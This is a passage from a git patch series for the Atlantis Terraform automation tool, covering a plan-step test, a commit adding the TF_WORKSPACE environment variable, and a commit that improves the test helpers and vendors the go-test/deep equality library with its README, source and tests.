env/workspace.tfvars file. + tmpDir, cleanup := tmpDir_stepTests(t) + defer cleanup() + err := os.MkdirAll(filepath.Join(tmpDir, "env"), 0700) + Ok(t, err) + envVarsFile := filepath.Join(tmpDir, "env/workspace.tfvars") + err = ioutil.WriteFile(envVarsFile, nil, 0644) + Ok(t, err) + + // Using version >= 0.10 here so we don't expect any env commands. 
+ tfVersion, _ := version.NewVersion("0.10.0") + logger := logging.NewNoopLogger() + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: tmpDir, + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile} + When(terraform.RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) + + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + // Verify that env select was never called since we're in version >= 0.10 + terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, tmpDir, []string{"env", "select", "-no-color", "workspace"}, tfVersion, "workspace") + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace") +} From 06f68b88e4961e3a7761255b8af35fa952a7a87a Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 22 Mar 2018 15:20:21 -0700 Subject: [PATCH 05/69] Add TF_WORKSPACE env var when execing terraform Even though we're switching to the right workspace this is a nice safeguard to have. I don't think it incurs additional time. --- server/events/terraform/terraform_client.go | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go index de3d6d23a4..a3508be724 100644 --- a/server/events/terraform/terraform_client.go +++ b/server/events/terraform/terraform_client.go @@ -107,6 +107,13 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st "TF_IN_AUTOMATION=true", // Cache plugins so terraform init runs faster. 
fmt.Sprintf("TF_PLUGIN_CACHE_DIR=%s", c.terraformPluginCacheDir), + // Terraform will run all commands in this workspace. We should have + // already selected this workspace but this is a fail-safe to ensure + // we're operating in the right workspace. + fmt.Sprintf("TF_WORKSPACE=%s", workspace), + // We're keeping this variable even though it duplicates TF_WORKSPACE + // because it's probably safer for users to rely on it. Terraform might + // change the way TF_WORKSPACE works in the future. fmt.Sprintf("WORKSPACE=%s", workspace), fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", v.String()), fmt.Sprintf("DIR=%s", path), From a22e23718c4ea4190a01c9c722b54134c1f7029d Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 24 Mar 2018 18:48:47 -0700 Subject: [PATCH 06/69] Improve test helpers. --- Gopkg.lock | 8 +- Gopkg.toml | 4 + testing/assertions.go | 25 +- testing/temp_files.go | 15 + vendor/github.com/go-test/deep/.gitignore | 2 + vendor/github.com/go-test/deep/.travis.yml | 13 + vendor/github.com/go-test/deep/CHANGES.md | 9 + vendor/github.com/go-test/deep/LICENSE | 21 + vendor/github.com/go-test/deep/README.md | 51 ++ vendor/github.com/go-test/deep/deep.go | 352 +++++++++ vendor/github.com/go-test/deep/deep_test.go | 821 ++++++++++++++++++++ 11 files changed, 1315 insertions(+), 6 deletions(-) create mode 100644 testing/temp_files.go create mode 100644 vendor/github.com/go-test/deep/.gitignore create mode 100644 vendor/github.com/go-test/deep/.travis.yml create mode 100644 vendor/github.com/go-test/deep/CHANGES.md create mode 100644 vendor/github.com/go-test/deep/LICENSE create mode 100644 vendor/github.com/go-test/deep/README.md create mode 100644 vendor/github.com/go-test/deep/deep.go create mode 100644 vendor/github.com/go-test/deep/deep_test.go diff --git a/Gopkg.lock b/Gopkg.lock index 8e3c34c6e2..9b1d483313 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -31,6 +31,12 @@ revision = "629574ca2a5df945712d3079857300b5e4da0236" version = "v1.4.2" +[[projects]] + name = 
"github.com/go-test/deep" + packages = ["."] + revision = "6592d9cc0a499ad2d5f574fde80a2b5c5cc3b4f5" + version = "v1.0.1" + [[projects]] branch = "master" name = "github.com/google/go-github" @@ -276,6 +282,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "00be02ec7fa459d29d2f8b3ab70a8fdf7e6c1085f4a6fd53ab6db452e0ade9da" + inputs-digest = "4e5fea92b65446bbdeccbdedfb28fb9c2ea21325b0335b3a4e7b98b60d47ccd6" solver-name = "gps-cdcl" solver-version = 1 diff --git a/Gopkg.toml b/Gopkg.toml index 3e16969628..92f54862f5 100644 --- a/Gopkg.toml +++ b/Gopkg.toml @@ -88,3 +88,7 @@ [[constraint]] branch = "master" name = "github.com/lkysow/go-gitlab" + +[[constraint]] + name = "github.com/go-test/deep" + version = "1.0.1" diff --git a/testing/assertions.go b/testing/assertions.go index cd5bf3ba5b..efb2ce9b14 100644 --- a/testing/assertions.go +++ b/testing/assertions.go @@ -16,9 +16,11 @@ package testing import ( "fmt" "path/filepath" - "reflect" "runtime" + "strings" "testing" + + "github.com/go-test/deep" ) // Assert fails the test if the condition is false. @@ -44,10 +46,11 @@ func Ok(tb testing.TB, err error) { // Equals fails the test if exp is not equal to act. // Taken from https://github.com/benbjohnson/testing. 
func Equals(tb testing.TB, exp, act interface{}) { - if !reflect.DeepEqual(exp, act) { + tb.Helper() + if diff := deep.Equal(exp, act); diff != nil { _, file, line, _ := runtime.Caller(1) fmt.Printf("\033[31m%s:%d:\n\n\texp: %#v\n\n\tgot: %#v\033[39m\n\n", filepath.Base(file), line, exp, act) - tb.FailNow() + tb.Fatal(diff) } } @@ -55,10 +58,22 @@ func Equals(tb testing.TB, exp, act interface{}) { func ErrEquals(tb testing.TB, exp string, act error) { tb.Helper() if act == nil { - tb.Errorf("exp err %q but err was nil", exp) + tb.Fatalf("exp err %q but err was nil", exp) } if act.Error() != exp { - tb.Errorf("exp err: %q but got: %q", exp, act.Error()) + tb.Fatalf("exp err: %q but got: %q", exp, act.Error()) + } +} + +// ErrContains fails the test if act is nil or act.Error() does not contain +// substr. +func ErrContains(tb testing.TB, substr string, act error) { + tb.Helper() + if act == nil { + tb.Fatalf("exp err to contain %q but err was nil", substr) + } + if !strings.Contains(act.Error(), substr) { + tb.Fatalf("exp err %q to contain %q", act.Error(), substr) + } +} diff --git a/testing/temp_files.go b/testing/temp_files.go new file mode 100644 index 0000000000..f91074967a --- /dev/null +++ b/testing/temp_files.go @@ -0,0 +1,15 @@ +package testing + +import ( + "io/ioutil" + "os" + "testing" +) + +// TempDir creates a temporary directory and returns its path along +// with a cleanup function to be called via defer. 
+func TempDir(t *testing.T) (string, func()) { + tmpDir, err := ioutil.TempDir("", "") + Ok(t, err) + return tmpDir, func() { os.RemoveAll(tmpDir) } +} diff --git a/vendor/github.com/go-test/deep/.gitignore b/vendor/github.com/go-test/deep/.gitignore new file mode 100644 index 0000000000..53f12f0f0e --- /dev/null +++ b/vendor/github.com/go-test/deep/.gitignore @@ -0,0 +1,2 @@ +*.swp +*.out diff --git a/vendor/github.com/go-test/deep/.travis.yml b/vendor/github.com/go-test/deep/.travis.yml new file mode 100644 index 0000000000..2279c61427 --- /dev/null +++ b/vendor/github.com/go-test/deep/.travis.yml @@ -0,0 +1,13 @@ +language: go + +go: + - 1.7 + - 1.8 + - 1.9 + +before_install: + - go get github.com/mattn/goveralls + - go get golang.org/x/tools/cover + +script: + - $HOME/gopath/bin/goveralls -service=travis-ci diff --git a/vendor/github.com/go-test/deep/CHANGES.md b/vendor/github.com/go-test/deep/CHANGES.md new file mode 100644 index 0000000000..4351819d68 --- /dev/null +++ b/vendor/github.com/go-test/deep/CHANGES.md @@ -0,0 +1,9 @@ +# go-test/deep Changelog + +## v1.0.1 released 2018-01-28 + +* Fixed #12: Arrays are not properly compared (samlitowitz) + +## v1.0.0 releaesd 2017-10-27 + +* First release diff --git a/vendor/github.com/go-test/deep/LICENSE b/vendor/github.com/go-test/deep/LICENSE new file mode 100644 index 0000000000..228ef16f74 --- /dev/null +++ b/vendor/github.com/go-test/deep/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright 2015-2017 Daniel Nichter + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall 
be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/vendor/github.com/go-test/deep/README.md b/vendor/github.com/go-test/deep/README.md new file mode 100644 index 0000000000..3b78eac7c1 --- /dev/null +++ b/vendor/github.com/go-test/deep/README.md @@ -0,0 +1,51 @@ +# Deep Variable Equality for Humans + +[![Go Report Card](https://goreportcard.com/badge/github.com/go-test/deep)](https://goreportcard.com/report/github.com/go-test/deep) [![Build Status](https://travis-ci.org/go-test/deep.svg?branch=master)](https://travis-ci.org/go-test/deep) [![Coverage Status](https://coveralls.io/repos/github/go-test/deep/badge.svg?branch=master)](https://coveralls.io/github/go-test/deep?branch=master) [![GoDoc](https://godoc.org/github.com/go-test/deep?status.svg)](https://godoc.org/github.com/go-test/deep) + +This package provides a single function: `deep.Equal`. It's like [reflect.DeepEqual](http://golang.org/pkg/reflect/#DeepEqual) but much friendlier to humans (or any sentient being) for two reason: + +* `deep.Equal` returns a list of differences +* `deep.Equal` does not compare unexported fields (by default) + +`reflect.DeepEqual` is good (like all things Golang!), but it's a game of [Hunt the Wumpus](https://en.wikipedia.org/wiki/Hunt_the_Wumpus). For large maps, slices, and structs, finding the difference is difficult. 
+ +`deep.Equal` doesn't play games with you, it lists the differences: + +```go +package main_test + +import ( + "testing" + "github.com/go-test/deep" +) + +type T struct { + Name string + Numbers []float64 +} + +func TestDeepEqual(t *testing.T) { + // Can you spot the difference? + t1 := T{ + Name: "Isabella", + Numbers: []float64{1.13459, 2.29343, 3.010100010}, + } + t2 := T{ + Name: "Isabella", + Numbers: []float64{1.13459, 2.29843, 3.010100010}, + } + + if diff := deep.Equal(t1, t2); diff != nil { + t.Error(diff) + } +} +``` + + +``` +$ go test +--- FAIL: TestDeepEqual (0.00s) + main_test.go:25: [Numbers.slice[1]: 2.29343 != 2.29843] +``` + +The difference is in `Numbers.slice[1]`: the two values aren't equal using Go `==`. diff --git a/vendor/github.com/go-test/deep/deep.go b/vendor/github.com/go-test/deep/deep.go new file mode 100644 index 0000000000..4ea14cb04e --- /dev/null +++ b/vendor/github.com/go-test/deep/deep.go @@ -0,0 +1,352 @@ +// Package deep provides function deep.Equal which is like reflect.DeepEqual but +// returns a list of differences. This is helpful when comparing complex types +// like structures and maps. +package deep + +import ( + "errors" + "fmt" + "log" + "reflect" + "strings" +) + +var ( + // FloatPrecision is the number of decimal places to round float values + // to when comparing. + FloatPrecision = 10 + + // MaxDiff specifies the maximum number of differences to return. + MaxDiff = 10 + + // MaxDepth specifies the maximum levels of a struct to recurse into. + MaxDepth = 10 + + // LogErrors causes errors to be logged to STDERR when true. + LogErrors = false + + // CompareUnexportedFields causes unexported struct fields, like s in + // T{s int}, to be comparsed when true. + CompareUnexportedFields = false +) + +var ( + // ErrMaxRecursion is logged when MaxDepth is reached. + ErrMaxRecursion = errors.New("recursed to MaxDepth") + + // ErrTypeMismatch is logged when Equal passed two different types of values. 
+ ErrTypeMismatch = errors.New("variables are different reflect.Type") + + // ErrNotHandled is logged when a primitive Go kind is not handled. + ErrNotHandled = errors.New("cannot compare the reflect.Kind") +) + +type cmp struct { + diff []string + buff []string + floatFormat string +} + +var errorType = reflect.TypeOf((*error)(nil)).Elem() + +// Equal compares variables a and b, recursing into their structure up to +// MaxDepth levels deep, and returns a list of differences, or nil if there are +// none. Some differences may not be found if an error is also returned. +// +// If a type has an Equal method, like time.Equal, it is called to check for +// equality. +func Equal(a, b interface{}) []string { + aVal := reflect.ValueOf(a) + bVal := reflect.ValueOf(b) + c := &cmp{ + diff: []string{}, + buff: []string{}, + floatFormat: fmt.Sprintf("%%.%df", FloatPrecision), + } + if a == nil && b == nil { + return nil + } else if a == nil && b != nil { + c.saveDiff(b, "") + } else if a != nil && b == nil { + c.saveDiff(a, "") + } + if len(c.diff) > 0 { + return c.diff + } + + c.equals(aVal, bVal, 0) + if len(c.diff) > 0 { + return c.diff // diffs + } + return nil // no diffs +} + +func (c *cmp) equals(a, b reflect.Value, level int) { + if level > MaxDepth { + logError(ErrMaxRecursion) + return + } + + // Check if one value is nil, e.g. T{x: *X} and T.x is nil + if !a.IsValid() || !b.IsValid() { + if a.IsValid() && !b.IsValid() { + c.saveDiff(a.Type(), "") + } else if !a.IsValid() && b.IsValid() { + c.saveDiff("", b.Type()) + } + return + } + + // If differenet types, they can't be equal + aType := a.Type() + bType := b.Type() + if aType != bType { + c.saveDiff(aType, bType) + logError(ErrTypeMismatch) + return + } + + // Primitive https://golang.org/pkg/reflect/#Kind + aKind := a.Kind() + bKind := b.Kind() + + // If both types implement the error interface, compare the error strings. 
+ // This must be done before dereferencing because the interface is on a + // pointer receiver. + if aType.Implements(errorType) && bType.Implements(errorType) { + if a.Elem().IsValid() && b.Elem().IsValid() { // both err != nil + aString := a.MethodByName("Error").Call(nil)[0].String() + bString := b.MethodByName("Error").Call(nil)[0].String() + if aString != bString { + c.saveDiff(aString, bString) + } + return + } + } + + // Dereference pointers and interface{} + if aElem, bElem := (aKind == reflect.Ptr || aKind == reflect.Interface), + (bKind == reflect.Ptr || bKind == reflect.Interface); aElem || bElem { + + if aElem { + a = a.Elem() + } + + if bElem { + b = b.Elem() + } + + c.equals(a, b, level+1) + return + } + + // Types with an Equal(), like time.Time. + eqFunc := a.MethodByName("Equal") + if eqFunc.IsValid() { + retVals := eqFunc.Call([]reflect.Value{b}) + if !retVals[0].Bool() { + c.saveDiff(a, b) + } + return + } + + switch aKind { + + ///////////////////////////////////////////////////////////////////// + // Iterable kinds + ///////////////////////////////////////////////////////////////////// + + case reflect.Struct: + /* + The variables are structs like: + type T struct { + FirstName string + LastName string + } + Type = .T, Kind = reflect.Struct + + Iterate through the fields (FirstName, LastName), recurse into their values. + */ + for i := 0; i < a.NumField(); i++ { + if aType.Field(i).PkgPath != "" && !CompareUnexportedFields { + continue // skip unexported field, e.g. s in type T struct {s string} + } + + c.push(aType.Field(i).Name) // push field name to buff + + // Get the Value for each field, e.g. FirstName has Type = string, + // Kind = reflect.String. 
+ af := a.Field(i) + bf := b.Field(i) + + // Recurse to compare the field values + c.equals(af, bf, level+1) + + c.pop() // pop field name from buff + + if len(c.diff) >= MaxDiff { + break + } + } + case reflect.Map: + /* + The variables are maps like: + map[string]int{ + "foo": 1, + "bar": 2, + } + Type = map[string]int, Kind = reflect.Map + + Or: + type T map[string]int{} + Type = .T, Kind = reflect.Map + + Iterate through the map keys (foo, bar), recurse into their values. + */ + + if a.IsNil() || b.IsNil() { + if a.IsNil() && !b.IsNil() { + c.saveDiff("", b) + } else if !a.IsNil() && b.IsNil() { + c.saveDiff(a, "") + } + return + } + + if a.Pointer() == b.Pointer() { + return + } + + for _, key := range a.MapKeys() { + c.push(fmt.Sprintf("map[%s]", key)) + + aVal := a.MapIndex(key) + bVal := b.MapIndex(key) + if bVal.IsValid() { + c.equals(aVal, bVal, level+1) + } else { + c.saveDiff(aVal, "") + } + + c.pop() + + if len(c.diff) >= MaxDiff { + return + } + } + + for _, key := range b.MapKeys() { + if aVal := a.MapIndex(key); aVal.IsValid() { + continue + } + + c.push(fmt.Sprintf("map[%s]", key)) + c.saveDiff("", b.MapIndex(key)) + c.pop() + if len(c.diff) >= MaxDiff { + return + } + } + case reflect.Array: + n := a.Len() + for i := 0; i < n; i++ { + c.push(fmt.Sprintf("array[%d]", i)) + c.equals(a.Index(i), b.Index(i), level+1) + c.pop() + if len(c.diff) >= MaxDiff { + break + } + } + case reflect.Slice: + if a.IsNil() || b.IsNil() { + if a.IsNil() && !b.IsNil() { + c.saveDiff("", b) + } else if !a.IsNil() && b.IsNil() { + c.saveDiff(a, "") + } + return + } + + if a.Pointer() == b.Pointer() { + return + } + + aLen := a.Len() + bLen := b.Len() + n := aLen + if bLen > aLen { + n = bLen + } + for i := 0; i < n; i++ { + c.push(fmt.Sprintf("slice[%d]", i)) + if i < aLen && i < bLen { + c.equals(a.Index(i), b.Index(i), level+1) + } else if i < aLen { + c.saveDiff(a.Index(i), "") + } else { + c.saveDiff("", b.Index(i)) + } + c.pop() + if len(c.diff) >= MaxDiff { + 
break + } + } + + ///////////////////////////////////////////////////////////////////// + // Primitive kinds + ///////////////////////////////////////////////////////////////////// + + case reflect.Float32, reflect.Float64: + // Avoid 0.04147685731961082 != 0.041476857319611 + // 6 decimal places is close enough + aval := fmt.Sprintf(c.floatFormat, a.Float()) + bval := fmt.Sprintf(c.floatFormat, b.Float()) + if aval != bval { + c.saveDiff(a.Float(), b.Float()) + } + case reflect.Bool: + if a.Bool() != b.Bool() { + c.saveDiff(a.Bool(), b.Bool()) + } + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + if a.Int() != b.Int() { + c.saveDiff(a.Int(), b.Int()) + } + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64: + if a.Uint() != b.Uint() { + c.saveDiff(a.Uint(), b.Uint()) + } + case reflect.String: + if a.String() != b.String() { + c.saveDiff(a.String(), b.String()) + } + + default: + logError(ErrNotHandled) + } +} + +func (c *cmp) push(name string) { + c.buff = append(c.buff, name) +} + +func (c *cmp) pop() { + if len(c.buff) > 0 { + c.buff = c.buff[0 : len(c.buff)-1] + } +} + +func (c *cmp) saveDiff(aval, bval interface{}) { + if len(c.buff) > 0 { + varName := strings.Join(c.buff, ".") + c.diff = append(c.diff, fmt.Sprintf("%s: %v != %v", varName, aval, bval)) + } else { + c.diff = append(c.diff, fmt.Sprintf("%v != %v", aval, bval)) + } +} + +func logError(err error) { + if LogErrors { + log.Println(err) + } +} diff --git a/vendor/github.com/go-test/deep/deep_test.go b/vendor/github.com/go-test/deep/deep_test.go new file mode 100644 index 0000000000..e764659b95 --- /dev/null +++ b/vendor/github.com/go-test/deep/deep_test.go @@ -0,0 +1,821 @@ +package deep_test + +import ( + "errors" + "fmt" + "testing" + "time" + + "github.com/go-test/deep" +) + +func TestString(t *testing.T) { + diff := deep.Equal("foo", "foo") + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal("foo", "bar") 
+ if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "foo != bar" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestFloat(t *testing.T) { + diff := deep.Equal(1.1, 1.1) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(1.1234561, 1.1234562) + if diff == nil { + t.Error("no diff") + } + + defaultFloatPrecision := deep.FloatPrecision + deep.FloatPrecision = 6 + defer func() { deep.FloatPrecision = defaultFloatPrecision }() + + diff = deep.Equal(1.1234561, 1.1234562) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(1.123456, 1.123457) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "1.123456 != 1.123457" { + t.Error("wrong diff:", diff[0]) + } + +} + +func TestInt(t *testing.T) { + diff := deep.Equal(1, 1) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(1, 2) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "1 != 2" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestUint(t *testing.T) { + diff := deep.Equal(uint(2), uint(2)) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(uint(2), uint(3)) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "2 != 3" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestBool(t *testing.T) { + diff := deep.Equal(true, true) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(false, false) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(true, false) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "true != false" { // unless you're fipar + t.Error("wrong diff:", diff[0]) + } +} + +func 
TestTypeMismatch(t *testing.T) { + type T1 int // same type kind (int) + type T2 int // but different type + var t1 T1 = 1 + var t2 T2 = 1 + diff := deep.Equal(t1, t2) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "deep_test.T1 != deep_test.T2" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestKindMismatch(t *testing.T) { + deep.LogErrors = true + + var x int = 100 + var y float64 = 100 + diff := deep.Equal(x, y) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "int != float64" { + t.Error("wrong diff:", diff[0]) + } + + deep.LogErrors = false +} + +func TestDeepRecursion(t *testing.T) { + deep.MaxDepth = 2 + defer func() { deep.MaxDepth = 10 }() + + type s3 struct { + S int + } + type s2 struct { + S s3 + } + type s1 struct { + S s2 + } + foo := map[string]s1{ + "foo": { // 1 + S: s2{ // 2 + S: s3{ // 3 + S: 42, // 4 + }, + }, + }, + } + bar := map[string]s1{ + "foo": { + S: s2{ + S: s3{ + S: 100, + }, + }, + }, + } + diff := deep.Equal(foo, bar) + + defaultMaxDepth := deep.MaxDepth + deep.MaxDepth = 4 + defer func() { deep.MaxDepth = defaultMaxDepth }() + + diff = deep.Equal(foo, bar) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "map[foo].S.S.S: 42 != 100" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestMaxDiff(t *testing.T) { + a := []int{1, 2, 3, 4, 5, 6, 7} + b := []int{0, 0, 0, 0, 0, 0, 0} + + defaultMaxDiff := deep.MaxDiff + deep.MaxDiff = 3 + defer func() { deep.MaxDiff = defaultMaxDiff }() + + diff := deep.Equal(a, b) + if diff == nil { + t.Fatal("no diffs") + } + if len(diff) != deep.MaxDiff { + t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff) + } + + defaultCompareUnexportedFields := deep.CompareUnexportedFields + deep.CompareUnexportedFields = true + defer func() { deep.CompareUnexportedFields = 
defaultCompareUnexportedFields }() + type fiveFields struct { + a int // unexported fields require ^ + b int + c int + d int + e int + } + t1 := fiveFields{1, 2, 3, 4, 5} + t2 := fiveFields{0, 0, 0, 0, 0} + diff = deep.Equal(t1, t2) + if diff == nil { + t.Fatal("no diffs") + } + if len(diff) != deep.MaxDiff { + t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff) + } + + // Same keys, too many diffs + m1 := map[int]int{ + 1: 1, + 2: 2, + 3: 3, + 4: 4, + 5: 5, + } + m2 := map[int]int{ + 1: 0, + 2: 0, + 3: 0, + 4: 0, + 5: 0, + } + diff = deep.Equal(m1, m2) + if diff == nil { + t.Fatal("no diffs") + } + if len(diff) != deep.MaxDiff { + t.Log(diff) + t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff) + } + + // Too many missing keys + m1 = map[int]int{ + 1: 1, + 2: 2, + } + m2 = map[int]int{ + 1: 1, + 2: 2, + 3: 0, + 4: 0, + 5: 0, + 6: 0, + 7: 0, + } + diff = deep.Equal(m1, m2) + if diff == nil { + t.Fatal("no diffs") + } + if len(diff) != deep.MaxDiff { + t.Log(diff) + t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff) + } +} + +func TestNotHandled(t *testing.T) { + a := func(int) {} + b := func(int) {} + diff := deep.Equal(a, b) + if len(diff) > 0 { + t.Error("got diffs:", diff) + } +} + +func TestStruct(t *testing.T) { + type s1 struct { + id int + Name string + Number int + } + sa := s1{ + id: 1, + Name: "foo", + Number: 2, + } + sb := sa + diff := deep.Equal(sa, sb) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + sb.Name = "bar" + diff = deep.Equal(sa, sb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "Name: foo != bar" { + t.Error("wrong diff:", diff[0]) + } + + sb.Number = 22 + diff = deep.Equal(sa, sb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 2 { + t.Error("too many diff:", diff) + } + if diff[0] != "Name: foo != bar" { + t.Error("wrong diff:", diff[0]) + } + if diff[1] != "Number: 2 != 22" { + t.Error("wrong diff:", 
diff[1]) + } + + sb.id = 11 + diff = deep.Equal(sa, sb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 2 { + t.Error("too many diff:", diff) + } + if diff[0] != "Name: foo != bar" { + t.Error("wrong diff:", diff[0]) + } + if diff[1] != "Number: 2 != 22" { + t.Error("wrong diff:", diff[1]) + } +} + +func TestNestedStruct(t *testing.T) { + type s2 struct { + Nickname string + } + type s1 struct { + Name string + Alias s2 + } + sa := s1{ + Name: "Robert", + Alias: s2{Nickname: "Bob"}, + } + sb := sa + diff := deep.Equal(sa, sb) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + sb.Alias.Nickname = "Bobby" + diff = deep.Equal(sa, sb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "Alias.Nickname: Bob != Bobby" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestMap(t *testing.T) { + ma := map[string]int{ + "foo": 1, + "bar": 2, + } + mb := map[string]int{ + "foo": 1, + "bar": 2, + } + diff := deep.Equal(ma, mb) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(ma, ma) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + mb["foo"] = 111 + diff = deep.Equal(ma, mb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "map[foo]: 1 != 111" { + t.Error("wrong diff:", diff[0]) + } + + delete(mb, "foo") + diff = deep.Equal(ma, mb) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "map[foo]: 1 != " { + t.Error("wrong diff:", diff[0]) + } + + diff = deep.Equal(mb, ma) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "map[foo]: != 1" { + t.Error("wrong diff:", diff[0]) + } + + var mc map[string]int + diff = deep.Equal(ma, mc) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } 
+ // handle hash order randomness + if diff[0] != "map[foo:1 bar:2] != " && diff[0] != "map[bar:2 foo:1] != " { + t.Error("wrong diff:", diff[0]) + } + + diff = deep.Equal(mc, ma) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != " != map[foo:1 bar:2]" && diff[0] != " != map[bar:2 foo:1]" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestArray(t *testing.T) { + a := [3]int{1, 2, 3} + b := [3]int{1, 2, 3} + + diff := deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + diff = deep.Equal(a, a) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + b[2] = 333 + diff = deep.Equal(a, b) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "array[2]: 3 != 333" { + t.Error("wrong diff:", diff[0]) + } + + c := [3]int{1, 2, 2} + diff = deep.Equal(a, c) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "array[2]: 3 != 2" { + t.Error("wrong diff:", diff[0]) + } + + var d [2]int + diff = deep.Equal(a, d) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "[3]int != [2]int" { + t.Error("wrong diff:", diff[0]) + } + + e := [12]int{} + f := [12]int{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10} + diff = deep.Equal(e, f) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != deep.MaxDiff { + t.Error("not enough diffs:", diff) + } + for i := 0; i < deep.MaxDiff; i++ { + if diff[i] != fmt.Sprintf("array[%d]: 0 != %d", i+1, i+1) { + t.Error("wrong diff:", diff[i]) + } + } +} + +func TestSlice(t *testing.T) { + a := []int{1, 2, 3} + b := []int{1, 2, 3} + + diff := deep.Equal(a, b) + if len(diff) > 0 { + 